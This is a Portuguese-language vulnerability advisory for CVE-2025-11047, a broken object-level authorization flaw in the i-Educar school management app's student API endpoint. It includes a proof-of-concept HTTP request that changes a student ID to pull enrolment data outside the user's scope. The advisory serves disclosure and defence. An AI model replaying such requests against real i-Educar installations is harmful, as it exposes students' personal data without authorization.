Featured image of post CVE-2025-11047
Controle De Acesso Quebrado Moderado I-Educar Securança WebApp BOLA

CVE-2025-11047

Controle de Acesso Quebrado (BOLA)

CVE-2025-11047: Broken Object Level Authorization (BOLA) permite a enumeração de registros de alunos via /module/Api/aluno

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-11047

Resumo

Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint /module/Api/aluno do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.

Essa falha permite que usuários com poucos privilégios (por exemplo, contas padrão de alunos/responsáveis) recuperem informações de matrícula (matrículas) de alunos fora de seu escopo, expondo Informações de Identificação Pessoal (PII) sem as devidas verificações de autorização.

Detalhes

Endpoint vulnerável: GET /module/Api/aluno

O aplicativo não consegue aplicar a autorização em nível de objeto ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.

Comportamento esperado:

  • Somente funções autorizadas (por exemplo, administradores, coordenadores, professores vinculados à turma) devem ter acesso a esses dados.
  • Usuários não autorizados devem receber a mensagem 403 "Proibido" ou uma resposta vazia.

Comportamento observado:

  • Qualquer usuário autenticado (mesmo contas com privilégios baixos) pode acessar este endpoint e recuperar informações confidenciais sobre turmas acadêmicas.

PoC

  • Autentique como um usuário sem privilégios (por exemplo, aluno, professor).

  • Envie a seguinte requisição:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

GET /module/Api/aluno?&oper=get&resource=matriculas&aluno_id=206 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://localhost/intranet/educar_aluno_det.php?cod_aluno=206
Cookie: i_educar_session=[LOW PRIVILEGED COOKIE]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

  • Pudemos observar que informações sobre classes foram retornadas.

Impacto

Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a:

  • Acesso não autorizado a PII sensíveis;
  • Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);
  • Possível abuso de dados do usuário ou personificação;
  • Enumeração de usuários.

Referência

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11047.md

Encontrado por

Marcelo Queiroz

Por: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy